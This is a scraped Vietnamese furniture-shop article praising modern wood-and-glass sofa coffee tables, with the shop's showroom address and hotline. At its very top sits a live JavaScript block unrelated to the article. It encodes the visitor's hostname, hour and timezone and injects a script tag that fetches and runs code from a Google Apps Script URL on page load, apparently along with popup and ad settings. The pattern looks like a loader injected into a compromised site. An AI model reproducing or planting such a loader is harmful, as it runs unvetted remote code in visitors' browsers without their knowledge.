var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Bàn sofa gỗ kính cho phòng khách hiện đại

Thị trường bàn trà phòng khách hiện nay rất đa dạng bởi rất nhiều mẫu đa dạng về kiểu dáng, chất liệu, màu sắc cho khách hàng lựa chọn. Trong đó, các mẫu bàn sofa gỗ kính hiện được nhiều gia đình lựa chọn hiện nay. Với các mẫu bàn trà này phòng khách hiện đại của gia đình bạn sẽ trở nên thu hút hơn bao giờ hết.

Bàn sofa gỗ kính kiểu dáng hiện đại

Các mẫu bàn sofa gỗ kính hiện nay thường được thiết kế theo phong cách hiện đại. Nét hiện đại ở đây là sự tối giản trong thiết kế với các đường nét nhẹ nhàng, thanh thoát. Điều này tương thích với các xu hướng thiết kế nội thất hiện đại ngày nay khi ngày càng đơn giản về thiết kế.

bàn sofa gỗ kính

Mẫu bàn trà thiết kế hiện đại phù hợp nhiều không gian


Căn phòng nhà bạn khi sở hữu mẫu bàn trà sofa này sẽ trở nên thoáng đãng, hiện đại nhất. Sự tối giản trong thiết kế khi không có quá nhiều đường nét cầu kỳ là yếu tố quyết định. Bạn cũng dễ dàng kết hợp cùng với các mẫu sofa cũng như tham trang tri cho phòng khách thêm ấn tượng.

Mẫu mã đa dạng

Một trong những lý do các mẫu bàn trà sofa này được yêu thích hiện nay đó là kiểu dáng đa dạng. Sự linh hoạt từ bàn trà hình vuông, hình chữ nhật đến hình tròn hay hình oval giúp mang đến nhiều sự lựa chọn khác nhau. Đây đều là những kiểu dáng mới lạ nằm trong bộ sưu tập các mẫu bàn trà hiện đại được yêu thích hiện nay.
 
bàn sofa gỗ kính
Sản phẩm đa dạng cho khách hàng lựa chọn


Các bạn cũng sẽ dễ dàng vệ sinh trong quá trình sử dụng với mặt bàn sáng bóng này. Việc bảo quản cũng không quá khó khăn để giữ được bàn trà bền đẹp trong suốt thời gian sử dụng.

Nội Thất Xinh có rất nhiều mẫu bàn sofa gỗ kính đẹp cho khách hàng lựa chọn. Cùng với đó, chúng tôi còn có các mẫu bàn trà sofa mặt đá đẹp, chất lượng đa dạng cho khách hàng lựa chọn. Đến ngay showroom của chúng tôi tại số 321 Trường Chinh – Thanh Xuân hoặc liên hệ hotline 0975.90.33333 để được tư vấn cụ thể nhé.

>>>Xem thêm: Bàn phòng khách đẹp nên chọn chất liệu nào?